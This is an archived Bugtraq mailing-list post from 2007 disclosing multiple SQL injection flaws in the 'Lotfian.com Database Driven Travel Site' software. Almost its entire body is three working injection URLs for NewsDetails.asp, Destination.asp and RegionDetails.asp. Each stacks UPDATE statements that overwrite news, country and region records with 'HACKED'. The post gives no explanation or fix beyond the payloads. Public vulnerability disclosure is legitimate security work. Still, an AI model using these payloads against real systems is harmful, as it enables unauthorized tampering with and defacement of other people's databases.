[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Lotfian.com DATABASE DRIVEN TRAVEL SITE Multiple SQL Injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Lotfian.com DATABASE DRIVEN TRAVEL SITE Multiple SQL Injection
From: no-reply@xxxxxxxxxxxxxxxxx
Date: 8 Dec 2007 21:26:04 -0000

Aria-Security Team
http://Aria-Security.Net
-----------------------------
Lotfian.com DATABASE DRIVEN TRAVEL SITE


NewsDetails.asp?NewsID=''UPDATE gtsNews set NewsDescription='HACKED' UPDATE 
gtsNews set NewsTitle='HACKED'

Destination.asp?CID=''UPDATE gtsCountry set CountyName='HACKED'

RegionDetails.asp?CID=''UPDATE gtsCountryRegion set 
CountryRegionName='hacked';--




Regards,
The-0utl4w

Credits Goes To Aria-Security Team

Prev by Date: [SECURITY] [DSA 1426-1] New qt-x11-free packages fix several vulnerabilities
Next by Date: webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability
Previous by thread: [SECURITY] [DSA 1426-1] New qt-x11-free packages fix several vulnerabilities
Next by thread: webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability
Index(es):
- Date
- Thread